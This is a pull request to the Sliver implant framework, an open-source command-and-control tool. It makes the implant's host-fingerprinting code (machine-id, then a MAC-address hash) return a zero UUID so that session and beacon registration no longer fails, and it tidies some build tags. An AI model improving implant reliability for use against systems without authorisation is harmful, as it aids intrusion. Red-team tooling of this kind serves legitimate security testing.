### PR TITLE
Return zero guid on hostuuid from mac error

### DIFF
--- a/implant/sliver/hostuuid/uuid.go
+++ b/implant/sliver/hostuuid/uuid.go
@@ -31,8 +31,10 @@ import (
 	"github.com/gofrs/uuid"
 )
 
+var zeroGUID = uuid.Must(uuid.FromString("00000000-0000-0000-0000-000000000000"))
+
 // UUIDFromMAC - Generate a UUID based on the machine's MAC addresses, this is
-// generally used as a last resort to fingerpint the host machine. It creates
+// generally used as a last resort to fingerprint the host machine. It creates
 // a uuid by hashing the MAC addresses of all network interfaces and using the
 // first 16 bytes of the hash as the UUID. This should work so long as network
 // interfaces are not added or removed, since its physical addresses this should
@@ -43,13 +45,16 @@ func UUIDFromMAC() string {
 	// {{end}}
 	interfaces, err := net.Interfaces()
 	if err != nil {
-		return ""
+		return zeroGUID.String()
 	}
 	hardwareAddrs := []string{}
 	for _, iface := range interfaces {
 		if iface.HardwareAddr != nil {
 			hardwareAddrs = append(hardwareAddrs, iface.HardwareAddr.String())
 		}
+	}
+	if len(hardwareAddrs) == 0 {
+		return zeroGUID.String()
 	}
 	sort.Strings(hardwareAddrs) // Ensure deterministic order
 	digest := sha256.New()
@@ -58,7 +63,7 @@ func UUIDFromMAC() string {
 	}
 	value, err := uuid.FromBytes(digest.Sum(nil)[:16]) // Must be 128-bits
 	if err != nil {
-		return ""
+		return zeroGUID.String()
 	}
 	return value.String()
 }

--- a/implant/sliver/hostuuid/uuid_darwin.go
+++ b/implant/sliver/hostuuid/uuid_darwin.go
@@ -1,23 +1,23 @@
-// +build darwin
+//go:build darwin
 
 package hostuuid
 
 /*
-Sliver Implant Framework
-Copyright (C) 2019  Bishop Fox
+	Sliver Implant Framework
+	Copyright (C) 2019  Bishop Fox
 
-This program is free software: you can redistribute it and/or modify
-it under the terms of the GNU General Public License as published by
-the Free Software Foundation, either version 3 of the License, or
-(at your option) any later version.
+	This program is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
 
-This program is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU General Public License for more details.
+	This program is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
 
-You should have received a copy of the GNU General Public License
-along with this program.  If not, see <https://www.gnu.org/licenses/>.
+	You should have received a copy of the GNU General Public License
+	along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */
 
 /*

--- a/implant/sliver/hostuuid/uuid_linux.go
+++ b/implant/sliver/hostuuid/uuid_linux.go
@@ -1,5 +1,4 @@
 //go:build linux
-// +build linux
 
 package hostuuid
 
@@ -23,15 +22,15 @@ package hostuuid
 
 import (
 	"fmt"
-	"io/ioutil"
+	"os"
 )
 
 // GetUUID - Get a system specific UUID
 func GetUUID() string {
-	uuid, err := ioutil.ReadFile("/etc/machine-id")
+	uuid, err := os.ReadFile("/etc/machine-id")
 	// UUID length is 32 plus newline
 	if err != nil || len(uuid) != 33 {
-		uuid, err = ioutil.ReadFile("/var/lib/dbus/machine-id")
+		uuid, err = os.ReadFile("/var/lib/dbus/machine-id")
 		if err != nil || len(uuid) != 33 {
 			return UUIDFromMAC() // Failed, try to use MAC addresses
 		}


### PR DESCRIPTION
Previously we returned an empty string if a Host UUID could not be determined, this caused session/beacon registration to fail. Now we return a zero UUID if we cannot find anything better to fingerprint the host.